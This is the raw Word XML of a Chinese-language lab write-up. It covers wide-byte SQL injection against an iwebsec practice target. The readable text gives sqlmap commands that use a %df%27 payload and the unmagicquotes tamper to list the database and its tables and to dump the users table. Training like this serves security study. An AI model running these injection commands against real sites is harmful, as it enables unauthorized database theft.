          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=1%df%27" --current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F45E4B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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆表名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=1%df%27" -D iwebsec --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4BEC57" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表数据：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=1%df%27" -D iwebsec -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146A139" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>自动处理宽字节：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>u "http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=1" --tamper=unmagicquotes --dump -D iwebsec -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0279D6" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="007220A3"/>
    <w:p w14:paraId="03BAF283" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="007220A3"/>
    <w:p w14:paraId="62B74E11" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="007220A3"/>
    <w:p w14:paraId="5DEF90E3" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5486"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007220A3">
      <w:headerReference w:type="default" r:id="rId6"/>
      <w:footerReference w:type="default" r:id="rId7"/>
      <w:pgSz w:w="11905" w:h="16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CFC816" w14:textId="77777777" w:rsidR="003C05FE" w:rsidRDefault="003C05FE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0DA486EC" w14:textId="77777777" w:rsidR="003C05FE" w:rsidRDefault="003C0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6702D0" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="007220A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CC83D7" w14:textId="77777777" w:rsidR="003C05FE" w:rsidRDefault="003C05FE">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37971226" w14:textId="77777777" w:rsidR="003C05FE" w:rsidRDefault="003C0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A77CF" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="007220A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splitPgBreakAndParaMark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20A3"/>
    <w:rsid w:val="001F3936"/>
    <w:rsid w:val="003C05FE"/>
    <w:rsid w:val="007220A3"/>
    <w:rsid w:val="00BE53EA"/>
    <w:rsid w:val="15E30CD7"/>
    <w:rsid w:val="58C1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8C97B"/>
  <w15:docId w15:val="{2DCB5A12-DD58-4953-BD40-16EBB244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14</Pages>
  <Words>1968</Words>
  <Characters>11221</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>93</Lines>
  <Paragraphs>26</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13163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LTSC</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-14T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-14T07:35:00Z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eyJoZGlkIjoiNzY2ZjAyN2JjMDBhNTk3ZWY1YmM2YzE2NGFhZDc3ODYiLCJ1c2VySWQiOiIyNDUwMjQ2ODMifQ==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8C6C9D8D75AE43D09A489B1D23A5A3A8_12</vt:lpwstr>
  </property>
</Properties>
</file>